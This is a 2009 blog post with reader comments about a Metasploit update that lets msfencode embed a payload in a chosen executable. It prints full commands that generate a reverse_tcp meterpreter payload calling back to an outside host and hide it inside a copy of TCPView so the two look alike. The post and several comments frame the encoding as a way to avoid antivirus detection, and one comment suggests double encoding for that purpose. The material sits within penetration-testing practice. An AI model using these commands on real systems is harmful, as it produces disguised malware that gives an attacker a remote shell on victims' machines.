Metasploit Blends in: New MSFPayload/ENcode
Monday, November 2, 2009 at 10:47PM In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.
But before I get into the new feature, lets quickly go over the standard way you use msfencode:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)root@bt4:/pentest/exploits/framework3#
We just used MSFPAYLOAD to output in [R]AW format, a reverse tcp connect meterpreter payload. We then piped it into MSFENCODE, so that we could output it as a proper Windows executable (/tmp/bob.exe), encoded to avoid AV detection.
Now if you knew where it was (data/templates/template.exe) you could probably just replace the template.exe with the one you want loaded with the payload and called it a day. But then you wouldn’t get some of the tweaks that make this update awesome.
The update added the (-x) option to msfencode. This allows you to specify an executable of your choosing to sacrifice to the gods. For example: (TCPView)
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443
R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)root@bt4:/pentest/exploits/framework3#
And if everything went well, we have a nice new executable in /tmp/ called Tcpview2.exe. Want to know the magic part? Try to tell them apart:
Reader Comments (13)
This is epic, i will have to play with this soon! Thank man.
Thanks something extra to play with soon.
this is THE most essential update to the metasploit arsenal, great timing!
Looks sick - quick one tho -
when you use the -x switch, does it keep the original executable intact
(i.e. does the TCPview2 run like the original while adding the rev meterpreter)?
Cheers Rob. Very nice, can't wait to have a play.
Very very cool feature. I wonder when we'll start seeing Malware using it in-the-wild.
good explanation. similar to the iexpress packaging stuff you showed off. dig it.
RE: Dumbars3 -
Nope, it pretty much takes over the process flow of the binary. But this is a good thing in a lot of ways.
Nice post, thanks!
just to mention that the -e x86/shikata_ga_nai parameter call was missed out (based on the command output).
RE: Anastasios Monachos
Setting the encoder type using -e is a good habit to get into but shikata_ga_nai is actually the default encoder, so you don't have to specify the encoder type.
--
Rob
This technique seems deprecated already.
AVG and many AV report win32/heur when scanning payloads encoded with -x
It's always a cat and mouse game.
double encode with the right encoders and AV detection dwindles